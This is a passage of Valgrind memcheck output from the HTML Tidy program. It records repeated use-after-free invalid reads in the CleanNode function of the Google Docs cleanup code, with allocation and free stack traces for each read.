==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D318: CleanNode (src/gdoc.c:115)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b8b068 is 56 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D327: CleanNode (src/gdoc.c:115)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b8b068 is 56 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D3BF: CleanNode (src/gdoc.c:131)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b8b058 is 40 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D204: CleanNode (src/gdoc.c:101)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b8b048 is 24 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D213: CleanNode (src/gdoc.c:103)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b8b048 is 24 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D22A: CleanNode (src/gdoc.c:105)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b8b190 is 16 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x434C9F: prvTidyTextToken (src/lexer.c:1568)
==1752197== by 0x437680: GetTokenFromStream (src/lexer.c:2649)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 4
==1752197== at 0x430E8E: prvTidynodeIsElement (src/tags.c:1053)
==1752197== by 0x41D23A: CleanNode (src/gdoc.c:107)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b8b1d0 is 80 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x434C9F: prvTidyTextToken (src/lexer.c:1568)
==1752197== by 0x437680: GetTokenFromStream (src/lexer.c:2649)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 4
==1752197== at 0x430E9F: prvTidynodeIsElement (src/tags.c:1053)
==1752197== by 0x41D23A: CleanNode (src/gdoc.c:107)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b8b1d0 is 80 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x434C9F: prvTidyTextToken (src/lexer.c:1568)
==1752197== by 0x437680: GetTokenFromStream (src/lexer.c:2649)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D253: CleanNode (src/gdoc.c:109)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b8e808 is 56 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D262: CleanNode (src/gdoc.c:109)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b8e808 is 56 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D28B: CleanNode (src/gdoc.c:111)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b8e808 is 56 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D29A: CleanNode (src/gdoc.c:111)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b8e808 is 56 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D2D7: CleanNode (src/gdoc.c:113)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b8e808 is 56 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D2E6: CleanNode (src/gdoc.c:113)
